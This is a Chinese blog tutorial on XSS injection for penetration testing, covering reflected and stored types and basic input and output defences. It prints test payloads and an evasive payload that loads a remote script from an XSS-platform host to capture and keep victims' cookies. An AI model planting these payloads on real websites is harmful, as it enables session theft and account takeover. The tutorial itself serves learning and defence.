【渗透测试】XSS注入原理

XSS注入原理

XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 XSS 攻击。

XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。

<script>alert(/XSS/)</script>
<script>console.log(1);</script>
<a href=javascript:alert(1)>
<a href='javascript:alert(1)'>aa</a>

XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。

关键点:我们输入的内容一定要是前端代码。

我们能输入的地方:

①.网站给我们提供的框框(搜索框)

②.网址的参数的值

XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。

	<font color='#ff6600'>非注册会员不可设</font>

	<script>alert(/cccccccccccc/)</script> # 作用:弹框

前端代码:html、css、【javascript】。

XSS的危害:

1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号

2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力

3、盗窃企业重要的具有商业价值的资料

4、非法转账

5、强制发送电子邮件(钓鱼)

6、网站挂马

7、控制受害者机器(肉鸡)向其它网站发起攻击

XSS分类

反射型的XSS:你输入的前端代码只执行了一次的就叫做反射型的XSS。

存储型的XSS:你输入的前端代码被目标网站存进了数据库里面,导致其他用户访问一次执行一次。

XSS平台——漏洞利用

XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。

无keepsession:半个小时,Cookie失效就失效了。

keepsession:保持Cookie的有效性。

</tExtArEa>'"><sCRiPt sRC=//xss8.cc/OAL5></sCrIpT>

短网址的方式

总结

1.XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。

2.XSS分类:反射型的XSS、【存储型的XSS】

3.XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。

答疑

1.&是什么?

keyword=你懂得&enc=utf-8&wq=XSS&pvid=50ff619dd1314c188a33df5ded7b6842

& 相当于 “和”/ and

2.里面的斜杠是双单引号?

语法格式

3.没有授权咋实战?

只能打靶

4.为什么第一次不行,这次好了。问题出在哪里?

复制的时候出了问题。

beef就是一个利用XSS漏洞的工具。

5.可以直接以QQ号主模式登录他QQ空间不?

XSS漏洞还是偏向于社工型。理论上是可以的。

6.那xss怎么去防范呢?

控制输入和输出。

开发人员应该该做的

输入处过滤。

输出处编码。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

粥粥粥少女的拧发条鸟

你的鼓励是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值